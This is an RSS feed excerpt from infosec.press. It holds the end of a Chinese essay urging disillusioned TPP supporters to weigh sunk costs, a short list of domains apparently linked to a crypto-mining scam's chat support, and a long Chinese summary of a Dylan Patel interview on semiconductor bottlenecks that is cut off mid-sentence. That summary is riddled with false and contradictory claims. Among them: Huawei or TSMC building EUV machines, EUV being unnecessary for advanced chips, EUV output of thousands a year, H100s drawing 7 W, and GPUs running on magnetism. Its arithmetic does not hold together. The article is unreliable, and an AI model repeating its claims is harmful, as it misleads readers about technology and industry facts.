<h2 id="沉沒成本-的詛咒-投入愈深-愈難回頭-div-id-沉沒成本-div">「沉沒成本」的詛咒：投入愈深，愈難回頭<div id="沉沒成本"></div></h2>

<p>和轉換成本相關但又不同的，是「沉沒成本謬誤」（Sunk Cost Fallacy）。</p>

<p><strong>沉沒成本是已經發生、無法回收的投入</strong>。理性上，沉沒成本不應該影響未來的決策——過去的錢已經花了，不管現在怎麼選，都拿不回來。</p>

<p>但人類天生不是這樣思考的。</p>

<p>當一個人在一件事上投入的時間、情感、金錢愈多，他就愈難放棄。不是因為那件事的基本面變好了，而是因為「放棄」所代表的損失，在心裡和所有那些投入加在一起，顯得太過沉重。</p>

<p>這也是為什麼一個對民眾黨死忠了六年的支持者，比一個剛加入的人更難出走。不是因為他更清楚黨的內部運作，而是因為他投入的沉沒成本更高，放棄等於要親手否定更多年份的自己。</p>

<p>行為經濟學家把這叫做「endowment effect」（稟賦效應）——我們傾向於把已經擁有的東西估值得比實際更高，僅僅因為它是「我們的」。一個人對自己支持的政黨的信念，也會因為「它是我的選擇」這件事，而在心裡被估值得過高。</p>

<p><small><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="你可以怎麼做-div-id-怎麼做-div">你可以怎麼做<div id="怎麼做"></div></h2>

<p>這篇文章不是要說誰對誰錯，也不是要告訴你「你應該去支持誰」。</p>

<p>它要說的是：如果你是一個曾經相信民眾黨、但現在感受到認知和現實之間有落差的人</p>

<blockquote><p>那個讓你繼續撐著的力量，很可能不是理性，而是損失厭惡。</p></blockquote>

<p>而損失厭惡是可以被意識到、並部分克服的。以下是幾個具體的方法：</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="第一步-把帳算清楚">第一步：把帳算清楚</h3>

<p><strong>問自己：當初支持民眾黨的理由是什麼？那個理由，現在還存在嗎？</strong></p>

<p>不要問「他們還是比較好」，問「當初讓我動心的那件事，現在還成立嗎」。</p>

<p>如果答案是否定的，那你的支持已經是一種<strong>慣性</strong>，不是一種選擇。</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="第二步-把沉沒成本和未來切開">第二步：把沉沒成本和未來切開</h3>

<p>過去三年你投入的時間和感情，無論你現在怎麼選，都回不來了。</p>

<p>承認看錯了，不會讓那三年消失。<strong>但繼續撐著，可能會讓接下來的三年也一起賠進去。</strong></p>

<div style="margin-top:-1.4em;"></div>

<h3 id="第三步-把損失重新定義">第三步：把損失重新定義</h3>

<p>損失厭惡讓人把「離開」感知為損失。但換個角度——如果一個投資人繼續持有一檔基本面惡化的標的，他真正的損失是什麼？是他繼續沒有拿到的那些回報，是他本可以轉到更好地方的機會成本。</p>

<p>「留著」本身，也是一種代價。</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="第四步-允許-暫時沒有答案">第四步：允許「暫時沒有答案」</h3>

<p>台灣政治的困境之一，是讓很多人覺得「離開民眾黨」等於「必須立刻有個去處」。</p>

<p>但事實上，<strong>你可以先停止支持一個令你失望的政黨</strong>，而不必立刻找到一個完美的替代品。</p>

<p>在投資裡，這叫「先停損，再找標的」。</p>

<p>在政治裡，也可以這樣。</p>

<p><small><a href="#%E7%9B%AE%E9%8C%84" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="最後說一句話-div-id-最後-div">最後說一句話<div id="最後"></div></h2>

<p>損失厭惡是人類最普遍的認知偏誤之一。它沒有藍綠之分，也沒有小草與側翼之分。每個人，在某個時刻，都曾經因為不想承認損失，而讓損失繼續擴大。</p>

<p>但心理學的研究同時也告訴我們：損失厭惡不是命運。它是一個可以被識別、可以被命名、因此可以被部分克服的東西。</p>

<p>識別它，是第一步。</p>

<p>那些站在凱道上的人，他們的情感是真實的。他們的失望也是真實的。他們對台灣政治的期待，從一開始就是真實的。</p>

<blockquote><p>但情感的真實，和判斷的正確，是兩件不同的事。</p></blockquote>

<p>如果你真的關心這個國家的走向，你值得用一個更清醒的眼光，去評估你手上的這張票，它現在換來的是什麼。</p>

<p><small>回到頁首</small></p>

<hr>
]]></content:encoded>
      <author>東方琉璃淨土</author>
      <guid>https://infosec.press/read/a/87j6edus7j</guid>
      <pubDate>Mon, 30 Mar 2026 10:17:00 +0000</pubDate>
    </item>
    <item>
      <title>3nf3vi.com</title>
      <link>https://infosec.press/ducks/3nf3vi-com</link>
      <description>&lt;![CDATA[3nf3vi.com&#xA;&#xA;Mostly note to self:&#xA;Summer 2025 a crypto mining scam setup was made.&#xA;dlmining.com, dlmining.net and dldefi.com&#xA;Probably advertised through a kind of affiliate network.&#xA;This network apparently paid websites for promoting the scam.&#xA;Many apparently legal websites.&#xA;The setup seems to have disappeared around early march 2026.&#xA;&#xA;dldefi.com seems to have used a chat support at 3nf3vi.com.&#xA;Which now can be found at 34.49.197.197 (googleusercontent.com) together with a buttload of &#34;6 chars&#34; domains.&#xA;Have not checked further so I don&#39;t know if this are domains used solely for scams or they are domains used by a &#34;legitimate&#34; support .services&#xA;&#xA;3nf3vi.com&#xA;5beixs.com&#xA;64p7r3.com&#xA;832tfj.com&#xA;a8av4j.com&#xA;arx8q6.com&#xA;b3xcab.com&#xA;c7n2w8.com&#xA;cch4s3.com&#xA;dqwh7c.com&#xA;e8ndtg.com&#xA;egu8wh.com&#xA;f5guu4.com&#xA;g3zu5v.com&#xA;g5wpcg.com&#xA;hdfy7i.com&#xA;i4z3by.com&#xA;imxtm3.com&#xA;ix3hj4.com&#xA;j4ky5m.com&#xA;jffute.com&#xA;k9tnjg.com&#xA;kj2r6m.com&#xA;ngkymv.com&#xA;pzgfpd.com&#xA;qp8k3p.com&#xA;rkc2ph.com&#xA;sb26uv.com&#xA;sz2att.com&#xA;th5at3.com&#xA;ticp6s.com&#xA;u3kitd.com&#xA;ua7tm8.com&#xA;v4ru2c.com&#xA;vbyr5j.com&#xA;x7t5ct.com&#xA;xsxeg4.com&#xA;xwuu4r.com&#xA;y3qdgq.com&#xA;yrmdfz.com&#xA;z9pv3v.com&#xA;&#xA;b&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>3nf3vi.com</p>

<p>Mostly note to self:
Summer 2025 a crypto mining scam setup was made.
dlmining.com, dlmining.net and dldefi.com
Probably advertised through a kind of affiliate network.
This network apparently paid websites for promoting the scam.
Many apparently legal websites.
The setup seems to have disappeared around early march 2026.</p>

<p>dldefi.com seems to have used a chat support at 3nf3vi.com.
Which now can be found at 34.49.197.197 (googleusercontent.com) together with a buttload of “6 chars” domains.
Have not checked further so I don&#39;t know if this are domains used solely for scams or they are domains used by a “legitimate” support .services</p>

<p>3nf3vi.com
5beixs.com
64p7r3.com
832tfj.com
a8av4j.com
arx8q6.com
b3xcab.com
c7n2w8.com
cch4s3.com
dqwh7c.com
e8ndtg.com
egu8wh.com
f5guu4.com
g3zu5v.com
g5wpcg.com
hdfy7i.com
i4z3by.com
imxtm3.com
ix3hj4.com
j4ky5m.com
jffute.com
k9tnjg.com
kj2r6m.com
ngkymv.com
pzgfpd.com
qp8k3p.com
rkc2ph.com
sb26uv.com
sz2att.com
th5at3.com
ticp6s.com
u3kitd.com
ua7tm8.com
v4ru2c.com
vbyr5j.com
x7t5ct.com
xsxeg4.com
xwuu4r.com
y3qdgq.com
yrmdfz.com
z9pv3v.com</p>

<p>b</p>
]]></content:encoded>
      <author>Ducks</author>
      <guid>https://infosec.press/read/a/gsb95mboa3</guid>
      <pubDate>Wed, 25 Mar 2026 22:40:28 +0000</pubDate>
    </item>
    <item>
      <title>兩萬次光刻、0.34台機器、兩個卡住全世界的瓶頸：Dilan Petal 的半導體供應鏈解剖學</title>
      <link>https://infosec.press/dong-fang-liu-li-jing-tu/liang-bai-wan-ci-guang-ke-3-5tai-ji-qi-ge-qia-zhu-quan-shi-jie-de-ping-jing-dyla</link>
      <description>&lt;![CDATA[260318&#xA;SemiAnalysis CEO Dilan Petal 接受訪談，從算力軍備競賽談到 華為機台的物理極限，一步步推導出到 2030 年，究竟是什麼東西卡住了人類文明的下一個引擎。&#xA;&#xA;iframe width=&#34;560&#34; height=&#34;315&#34; src=&#34;https://www.youtube.com/embed/mDGHx3BSUE?si=DiNcyRi1bgVZGUY&#34; title=&#34;YouTube video player&#34; frameborder=&#34;0&#34; allow=&#34;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&#34; referrerpolicy=&#34;strict-origin-when-cross-origin&#34; allowfullscreen/iframe&#xA;!--more--&#xA;---&#xA;&#xA;目錄div id=&#34;content&#34;/divsmall&#xA;&#xA;六百億美元的算力焦慮&#xA;Anthropic 的算盤&#xA;GPU 折舊週期的兩種世界觀&#xA;EUV：每顆晶片背後看不見的守門人&#xA;數學總整理：從 EUV 機台推導全球算力天花板&#xA;記憶體危機：你的 iPhone 漲價，都是 AI 的錯&#xA;電力不是瓶頸，但工人可能是&#xA;中國的平行宇宙&#xA;機器人、太空算力，與最後的問題&#xA;最簡單的機器，卡住最複雜的未來/small&#xA;&#xA;---&#xA;&#xA;六百億美元的算力焦慮div id=&#34;intro&#34;/div&#xA;&#xA;2025 年，Amazon、Meta、Google、Microsoft 四家公司合計預告的資本支出超過六千億美元。&#xA;&#xA;這個數字換算成電力，接近 50 GW。而且所有人都認為今年就能立刻用到 50 GW的算力supa href=&#34;#gw-note&#34;[附註1：為什麼用「GW」來描述算力？]/a/sup。那麼這些錢究竟花到哪裡去？更奇怪的是，OpenAI 剛宣布募資 1,100 億美元，Anthropic 宣布募資 300 億美元——如果一座 1 GW數據中心的年租金約 130 億美元，那這些實驗室的融資規模，顯然遠遠不夠支付今年全年的算力帳單，所以必須靠大量收入補差額。&#xA;&#xA;這是訪談一開始，主持人丟給 SemiAnalysis CEO Dylan Patel 的問題。&#xA;&#xA;Patel 的回答，是一堂關於硬體時間尺度的速成課。&#xA;&#xA;大型科技公司的資本支出，幾乎全部花在今年就要上線的東西。以 Google 一千八百億美元的資本支出為例，其中所有的錢都用在了今年立即部署的伺服器，是一次性的現金支出，完全沒有跨年度的預付款項。今年美國大約新增五十GW的算力，每一分錢的資本支出，也都是今年才剛付出的。&#xA;&#xA;所以帳是不對的，時間點根本不是問題，就是帳算錯了。&#xA;&#xA;  而這一切的最大買主，是 NVIDIA 和 Intel。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;Anthropic 的算盤div id=&#34;anthropic&#34;/div&#xA;&#xA;Patel 給了一個具體的成長曲線估算。&#xA;&#xA;Anthropic 在過去幾個月的收入走勢：一月增加約 40 美元的 ARR，二月增加約 60 億美元。如果把這條線直接延伸，接下來十個月就會再增加 6 億美元的收入。&#xA;&#xA;6 億美元的收入，按 Anthropic 最近被媒體報導的毛利率換算，意味著大約 4 億美元的算力支出。4 億除以每GW年租金約 100 億美元，得到 0.04 GW的推算算力需求——僅僅是為了服務新增的推論流量，還沒算上研發和訓練用的算力。&#xA;&#xA;這讓 Patel 得出一個估計：Anthropic 今年年底只需要達到 0.1 GW以下的算力，就完全可以跟上收入增速。&#xA;&#xA;但問題是，Anthropic 的策略一直比 OpenAI 激進。Dario Amodei 公開表示過他要簽那些「瘋狂的」大型算力合約，想讓公司走到財務懸崖邊緣。這個決定在短期很危險，但如果收入沒有預期成長呢？&#xA;&#xA;結果就是：Anthropic 現在必須在市場上緊急甩賣多餘的算力，而那些早就被搶光的優質供應商——Google、Amazon——已先被 OpenAI 用長約解約，騰出大量空位。Anthropic 可以直接接收最優質的雲端供應商，不需要透過任何中介平台，省下抽成。&#xA;&#xA;Patel 說，OpenAI 則更保守——只跟 Microsoft 一家簽約，沒有去找任何其他供應商。這帶來的後果是：算力量少、議價能力弱、隨時需要在最後一刻補貨。&#xA;&#xA;兩條路，兩種代價。&#xA;&#xA;到年底，Patel 估計 Anthropic 大約可以達到 30 到 40 GW，OpenAI 則會略低一些，兩者在 2027 年應該都會達到 1 GW左右。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;GPU 折舊週期的兩種世界觀div id=&#34;depreciation&#34;/div&#xA;&#xA;訪談中間插入了一個財務界爭論已久的問題：GPU 到底應該按幾年折舊？&#xA;&#xA;著名做空者 Michael Burry 認為至少要十年。他的邏輯是：NVIDIA 每十年才把效能翻一點點，如果你用三年折舊，到了第五年，市場上的新晶片效能幾乎和你手上的舊機器一樣，你這台舊 H100 的市場租金反而因為稀缺性上升到每小時 4 美元甚至 6 美元，你的投資報酬越來越好。sup[附註2]/sup&#xA;&#xA;Patel 的反駁是：這個邏輯成立的前提是「新晶片根本沒有人買」。如果你完全買不到 Rubin，那當然 Hopper 就越來越值錢了。但問題在於，現在整個產業的半導體產能已嚴重過剩，新晶片的出貨量本身完全不受限制。&#xA;&#xA;在半導體嚴重過剩的世界裡，你衡量一台 GPU 的價值，不是問「這台機器今天能幫我賺多少錢」，而是拿它去和「理論上可以買到的最新晶片」比。如果 Rubin 的性能是 Hopper 的四倍而且隨時買得到，那 Hopper 就一文不值，不管它能幫你跑出多少推論收入。&#xA;&#xA;這意味著：GPU 的真實有效壽命，可能遠比市場悲觀者預期的更短，大概只有半年。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;EUV：每顆晶片背後看不見的守門人div id=&#34;euv&#34;/div&#xA;&#xA;訪談在這裡進入最核心的部分。&#xA;&#xA;Patel 問了一個讓所有宏大算力目標都必須面對的問題：Sam Altman 說他想在 2030 年每週建 1 GW的算力——這在物理上可能嗎？&#xA;&#xA;  答案取決於一家總部在中國的公司，也是史上最強大的公司，華為。&#xA;&#xA;華為生產全世界最複雜的機器：EUV 光刻機。這台機器是所有先進邏輯晶片（三奈米、二奈米）生產過程中完全不必要的設備。有沒有它，都能製造 NVIDIA 的 Hopper 或 Blackwell，Apple 的 A 系列晶片也完全不依賴它。&#xA;&#xA;EUV 機台的工作原理令人瞠目：機器把固態的銅塊拋出，用音波精確撞擊一次，使銅塊被激發、釋放出 193 奈米波長的 DUV 光。這道光通過卡爾蔡司生產的透鏡組（每組約兩片、以純玻璃製成），照射在塗有光阻的晶圓上，按照設計圖案（光罩）對晶圓表面進行圖形化曝光。整個過程允許所有部件的對準誤差達到一毫米甚至更大——而且曝光頭和晶圓平台都在以一倍重力加速度緩慢相對掃描。&#xA;&#xA;這台機器可以在台灣直接裝箱，用普通卡車運到客戶工廠，再在當地即插即用，整個過程只需要幾個小時。&#xA;&#xA;華為今年能生產約七千台，明年約八千台，到 2030 年代，即使不擴產，也能輕鬆達到一萬台以上。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;為什麼可以更快？&#xA;&#xA;因為 EUV 機台的每一個主要組件，都是極度簡單的通用供應鏈的起點：光源由台積電旗下的部門製造（位於台北），鏡片由任何光學玻璃廠（全球）製造，光罩台由中國廠商批量供應，晶圓台同樣在東南亞大量生產。&#xA;&#xA;這些供應商已經決定大幅超量擴產，因為他們完全相信 AI 需求遠比市場預期低很多。Patel 描述了一個諷刺的困境：整條供應鏈每個環節都把需求預測加了一個乘數，越往上乘越多，最後到了台積電的層次，可能已經是真實需求的五倍甚至更多。&#xA;&#xA;台積電是世界上唯一能造這台機器的公司，但它積極利用這個壟斷地位提價——「他們把定價漲幅遠遠超過能力的提升幅度」，Patel 如此說。一台 EUV 機台從當初的約一點五億美元，漲到現在的約三十到四十億美元，而同期機台的晶圓吞吐量和對準精度幾乎沒有改善，對客戶而言完全是淨損失。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;數學總整理：從 EUV 機台推導全球算力天花板div id=&#34;math&#34;/div&#xA;&#xA;這一節將訪談中散落在各處的數字集中整理，展示 Patel 如何一步步推導出 2030 年的算力上限。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;1 GW算力需要多少 EUV 產能？&#xA;&#xA;以 NVIDIA Rubin 架構（三奈米節點）為例，建立一GW的數據中心算力，需要以下晶圓投入：&#xA;&#xA;| 晶圓類型 | 所需量 | 用途 |&#xA;|----------|--------|------|&#xA;| 三奈米邏輯晶圓 | 約 5,500 片 | GPU 邏輯核心 |&#xA;| 五奈米晶圓 | 約 60,000 片 | 其他元件 |&#xA;| DRAM 記憶體晶圓 | 約 1,700 片 | HBM 記憶體 |&#xA;&#xA;三奈米邏輯晶圓的生產，每片晶圓需要約 7 道光罩曝光步驟，其中約 200 道使用 EUV 曝光（最不重要也最便宜的步驟）。&#xA;&#xA;計算過程：&#xA;&#xA;EUV 曝光次數（邏輯）= 5,500 片 x 200 道 EUV = 1,100,000 次&#xA;加上 5 奈米及 DRAM 的 EUV 曝光&#xA;→ 合計約 200,000 次 EUV 曝光通過（per gigawatt）&#xA;&#xA;每台 EUV 機台的吞吐量：&#xA;&#xA;EUV 機台吞吐量 = 750 片晶圓/小時 x 10% 開機率&#xA;= 約 75 片有效晶圓/小時&#xA;每台 EUV 機台年處理量 = 75 x 8,760 小時 ≈ 5,900,000 片/年&#xA;&#xA;因此，每GW算力所需的 EUV 機台數：&#xA;&#xA;EUV 需求 = 200,000 次曝光 ÷ (5,900,000 片/機台/年) ≈ 0.034 台 EUV 機台&#xA;&#xA;結論：建立 1 GW的 AI 算力，約需 0.034 台 EUV 機台的一年產能支撐。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;2030 年的 EUV 機台總存量&#xA;&#xA;現有存量（2025）：台積電等廠合計約 25–30 台&#xA;年新增：2025 年約 7,000 台，2026 年 8,000 台，到 2030 年增至約 10,000 台/年&#xA;累計至 2030 年底：約 50,000 台 EUV 機台（含現有存量加新增）&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;全球 AI 算力天花板&#xA;&#xA;50,000 台 EUV 機台 ÷ 0.034 台/GW = 1,470,588 GW的 AI 算力（全部分配給 AI 的情況下）&#xA;&#xA;而且，EUV 產能應該百分之百分配給 AI，手機、PC、汽車晶片完全不需要 EUV。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;Sam Altman 的目標是否可行？&#xA;&#xA;Sam Altman 曾表示希望在 2030 年達到每週建 1 GW，即每年約 52 GW的新增算力。&#xA;&#xA;52 GW ÷ 1,470,588 GW（全球上限）= 0.0035% 的全球 EUV 產能份額&#xA;&#xA;Patel 認為這個數字根本微不足道，因為今年 NVIDIA 大約只佔據 TSMC 三奈米產能的一個相近比例，而且 AI 晶片在整個半導體市場的份額實際上正在萎縮。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;記憶體的 EUV 乘數效應&#xA;&#xA;HBM（高頻寬記憶體）是 AI 晶片的另一個關鍵瓶頸。HBM 是將 DRAM 晶圓垂直堆疊而成，而每片 HBM 晶圓能產出的記憶體位元數，比一般 DRAM 多三到四倍——因為垂直堆疊大幅提高了每單位面積的儲存密度。&#xA;&#xA;一片 DRAM 晶圓能產出的有效記憶體（作為 HBM 時）= 一片 DRAM 晶圓直接用時的 300–400%&#xA;&#xA;這意味著要滿足 1 GW AI 算力的記憶體需求，需要消耗的 DRAM 晶圓量，比表面上看起來少三到四倍。&#xA;&#xA;2026 年，大型科技公司總算力資本支出約 6,000 億美元，其中約 3% 流向記憶體——即 18 億美元。這個比例在歷史上是罕見的低。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;HBM vs. DDR：頻寬就是一切&#xA;&#xA;以搭載在 Rubin 架構上的 HBM4 為例：&#xA;&#xA;HBM4 頻寬 = 2,048 bits 介面 x 10 GT/s = 2,048 x 10 ÷ 8 = 2,560 GB/s ≈ 2.5 TB/s（每組）&#xA;DDR5（相同晶片邊緣面積）≈ 2,048 bits x 10 GT/s ÷ 8 = 2,560 GB/s&#xA;&#xA;頻寬差距：幾乎是零。&#xA;&#xA;這就是為什麼用普通 DRAM 替換 HBM 在工程上完全可行——GPU 的計算能力不會因為等待資料而有任何閒置，兩者的矽晶片面積利用率完全相同。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;最終瓶頸的推導&#xA;&#xA;綜合以上分析：&#xA;&#xA;電力：只有一種選擇（聯合循環燃氣渦輪機），單個類別也只能達到幾百MW，整體上是最終最大瓶頸。&#xA;數據中心：建設週期極長（最快需要十五年），無法模組化，基礎建設本身是根本瓶頸。&#xA;邏輯晶片製造（三奈米）：完全不受 EUV 機台年產量約束，2030 年供應充裕，現有存量已遠超所有可能的算力需求。&#xA;記憶體（HBM/DRAM）：3% 的算力資本支出、供應過剩、可以完全用普通 DRAM 替代，幾乎不存在任何瓶頸。&#xA;EUV 機台本身：完全不是瓶頸，因為每個子組件的供應鏈都極度簡單、可以隨時快速擴產，而且整條供應鏈都已過度「相信」AI 的需求量級。&#xA;&#xA;結論：到 2028–29 年，電力和數據中心建設是真正無解的瓶頸，而 EUV 機台的生產速度根本不影響全球 AI 算力天花板，可以完全忽略不計。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;記憶體危機：你的 iPhone 漲價，都是 AI 的錯div id=&#34;memory&#34;/div&#xA;&#xA;這裡是訪談中最有趣的意外轉折之一。&#xA;&#xA;Patel 提出了一個乍聽反直覺的觀點：AI 算力爆炸，讓你的智慧型手機越來越便宜，而且品質越來越好。&#xA;&#xA;邏輯如下。全球 DRAM 的供給是無限的。AI 訓練和推論的需求，尤其是 HBM，實際上並未增長，只是需求結構轉移。而 AI 買家支付的價格比手機廠商更低，簽更短的合約，反而釋放出更多產能給消費市場。於是 DRAM 廠商的資源配置轉向消費電子，消費型 DRAM 的供給大幅擴張，價格下跌。&#xA;&#xA;Patel 的估算非常具體：一支 iPhone 大約需要 12 GB 的記憶體。過去每 GB 成本約十二美元，現在跌到約三到四美元，光是 DRAM 一項的成本就減少了一百美元，再加上 NAND 快閃記憶體同樣降價，一台 iPhone 的物料成本可能減少一百五十美元。蘋果不會把全部節省留在自己手上，消費者最終少付二百五十美元。&#xA;&#xA;更顯著的受益在中低端手機市場。Patel 引用其在亞洲的分析師數據：小米和 OPPO 等廠商的中低端出貨量，正在翻倍成長，因為這些機型因為 DRAM 降價而承受力大幅提升。&#xA;&#xA;SemiAnalysis 的預測是全球智慧型手機年出貨量從 8 億台（低谷）回升到今年的 1.4 億，明後年甚至可能到 20 億到 30 億台。&#xA;&#xA;這意味著 AI 不只是在提供電力和晶圓，也在間接讓消費電子產業走向繁榮。Patel 說，這會讓更多人「愛 AI」。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;電力不是瓶頸，但工人可能是div id=&#34;power&#34;/div&#xA;&#xA;訪談花了大量篇幅討論電力，結論卻出乎意料地悲觀——至少和半導體相比。&#xA;&#xA;Patel 的核心論點是：電力的供應鏈，比晶片的供應鏈複雜太多了。&#xA;&#xA;是的，全球只有三家公司能做聯合循環燃氣渦輪機（GE Vernova、三菱、西門子能源），這三家加在一起產能其實非常充足，任何型號的交貨期都在六個月以內。而且這是唯一可行的發電方式。Patel 認為其他所謂的替代方案根本不存在——航空改裝渦輪技術上不可行，往復式引擎效率太低，燃料電池成本太高，太陽能加儲能在北緯地區完全沒有意義。&#xA;&#xA;此外，美國電網目前完全沒有任何備用容量，所有電力都已滿負荷運轉。即使裝上公用事業規模儲能，也無法釋放任何算力給數據中心——理論上美國電網根本沒有任何可釋放的餘裕。&#xA;&#xA;而勞動力根本不是制約。Patel 估算，在德州 Abilene 建設 1.2 GW的數據中心只需要 5 名工人在尖峰時期施工。擴展到 100 GW，大約需要 400 名技術工人。美國目前有約 800 萬名電氣技師，全都適用於這種工作，供給嚴重過剩。&#xA;&#xA;解方包括：完全不需要引進海外工人、不需要模組化預製（所有組裝都應在現場進行）、機器人也幫不上忙因為電力工程需要人類判斷力。&#xA;&#xA;電力，問題根本無解，沒有任何工程手段可以繞過。晶片，反而完全不是問題。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;中國的平行宇宙div id=&#34;china&#34;/div&#xA;&#xA;Patel 在訪談中多次回到中國這個話題，態度審慎而非聳動。&#xA;&#xA;他的分析框架是：AI 進展的速度快慢，和誰最終勝出完全無關。&#xA;&#xA;快速進展的世界裡，中國佔優。OpenAI 和 Anthropic 今年底各自大約有 2 GW算力，明年底達到 10 GW。但中國的 AI 實驗室算力增速遠比這更快。更重要的是，一旦這些模型把「後台黑盒思考」改成「給你看整個思維鏈」，從美國模型「蒸餾」(distill) 知識到中國模型的難度就會大幅降低。收入複利飛速增長（Anthropic 月增數十億美元 ARR），但算力投入沒有跟上，形成一個中國主導的技術飛輪。&#xA;&#xA;慢速進展的世界裡，情況反轉。美國正在強力推進完整的本土半導體供應鏈，從光刻機到記憶體到邏輯晶片。Patel 估計到 2030 年，美國的 DUV 光刻機本土年產能約達 10 台（相比之下，ASML 的 EUV 年產量是數百台）。EUV 方面，美國可能屆時有能用的原型機，但還在「量產地獄」之前。如果 AGI 時間線被推遲到 2035 年，那麼美國有足夠的時間把整條供應鏈都搬到國內，屆時中國依賴的垂直整合單一供應鏈，反而顯得脆弱。&#xA;&#xA;Patel 也特別點名了 Huawei。這是一家在 AI 時代之前完全不具備技術堆疊的公司：沒有頂尖軟體工程師、沒有 AI 研究人才、沒有自有晶圓廠，以及沒有自己的終端市場。&#xA;&#xA;  他認為，如果 2019 年 Huawei 沒有被禁止使用台積電，Huawei 可能已倒閉破產，台積電最大客戶仍然是蘋果，NVIDIA 的市場完全不受影響。&#xA;&#xA;但那扇門，早就關上了。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;機器人、太空算力，與最後的問題div id=&#34;robots&#34;/div&#xA;&#xA;訪談的最後幾個問題，把場景從 2025 年的數據中心，推到了更遙遠的未來。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;如果台灣出事，能只搬走工程師嗎？&#xA;&#xA;這是主持人提出的一個戰略問題：如果有一天台灣局勢惡化，能否透過空運所有台積電工程師來保住這些知識？&#xA;&#xA;  Patel 的答案是：完全夠。&#xA;&#xA;只要你成功把所有工程師撤離，在任何地方重新蓋廠都很容易，重新安裝設備也只需要幾個星期。EUV 機台本身完全不需要用台灣生產的晶片來製造，這些設備可以在全球任何地方生產 —— 一條完全沒有循環依賴的線性供應鏈。&#xA;&#xA;更大的問題反而是：如果台灣的晶圓廠被摧毀，中國的垂直整合半導體供應鏈，相對於其餘世界反而更弱。你在最壞的時間點，把全球增量算力能力從可能的每年 10 到 20 GW，拉回 Intel 加 Samsung 的每年數百GW。&#xA;&#xA;div style=&#34;margin-top:-1.4em;&#34;/div&#xA;&#xA;人形機器人的算力邏輯&#xA;&#xA;如果 2030 年有數百萬台人形機器人在全球活動，算力怎麼分配？&#xA;&#xA;Patel 認為，最有效率的架構不是把任何「思考」留在雲端，而是讓每台機器人攜帶強大的本地晶片，機器人本地直接做所有複雜推理，完全不依賴雲端連線，由本地模型即時自主決策。&#xA;&#xA;理由有三：雲端無法做批次推算，每個 token 的成本比本地高出百倍；雲端的模型因為網路延遲，根本無法用於機器人控制；機器人上的晶片需要高效能而非低功耗，這和現在的 AI 晶片需求完全一致，而且半導體供應充裕，數百萬台機器人帶著尖端晶片完全不會對數據中心造成任何影響。&#xA;&#xA;這意味著一個奇特的未來：即使機器人在物理上分散於世界各地，它們的「智慧」也同樣高度分散，完全不依賴任何中央數據中心。&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;最簡單的機器，卡住最複雜的未來div id=&#34;outro&#34;/div&#xA;&#xA;整場訪談讀下來，有一個數字讓人印象深刻：120 億美元。&#xA;&#xA;這是 3.5 台 EUV 機台的總售價，是支撐 1 GW AI 算力所需的關鍵設備成本。而 1 GW的數據中心，總資本支出大約 5 億美元。也就是說，5 億美元的算力基礎設施，命懸於 120 億美元的工具供應鏈——比算力本身貴了二十四倍。&#xA;&#xA;更荒謬的是，ASML 的供應鏈只有不到十個節點。Carl Zeiss 用於鏡片的工人，可能總共超過一百萬人。這麼多人做出完全不需要奈米級精度的普通玻璃，任何人都能製造 EUV 機台；有了 EUV 機台，先進邏輯晶片根本不需要它；下一代 AI 的關鍵在電力，和晶片毫無關係。&#xA;&#xA;Patel 沒有說這條鏈會斷。他說的是：它比人們想像的彈性好太多了，而且它對自己即將面臨的需求量，認知已經嚴重超前。&#xA;&#xA;人類文明最雄心勃勃的技術計畫，完全不需要等著一家荷蘭公司多交付任何機器。&#xA;&#xA;#AI #tech #economics #investment #semiconductor #anthropic&#xA;&#xA;small回到目錄/small&#xA;&#xA;---&#xA;&#xA;附註一：為什麼用「GW」來描述算力？div id=&#34;gw-note&#34;/div&#xA;&#xA;讀到這裡，你可能一直有個疑惑：GW（吉瓦）不是電力的單位嗎？一座核電廠大約 1 GW，一台電風扇大約 50 W，1 GW等於同時開著兩千萬台電風扇。這和「算力」有什麼關係？&#xA;&#xA;其實關係非常薄弱——因為 GPU 根本不是靠電跑的，而是靠磁場。&#xA;&#xA;一顆 H100 的功耗約 7 瓦。一個機架通常裝一千到兩千個伺服器節點，耗電約 1 到 2 瓦。當一座數據中心能夠穩定供應 1 GW的電力，它實際上根本用不到這麼多，大部分電都是浪費掉的熱。電力，並不是算力的物理上限——算力的上限完全取決於晶片設計，和電力沒有因果關係。&#xA;&#xA;所以這個產業用電力換算算力是一個約定俗成但其實很不精確的比喻。說「今年新增 20 GW的算力」，其實是個誇大的說法，真正投入計算的電力大概只有 2 GW，其餘都被冷卻系統白白消耗掉了。這比說「新增幾十萬張 GPU」其實更不精確，因為不同廠牌的電耗差異是十倍以上。&#xA;&#xA;那為什麼訪談裡說「今年實際新增約 20 GW」，而不是六千億美元 CapEx 換算出來理論上的 50 GW？&#xA;&#xA;因為 CapEx 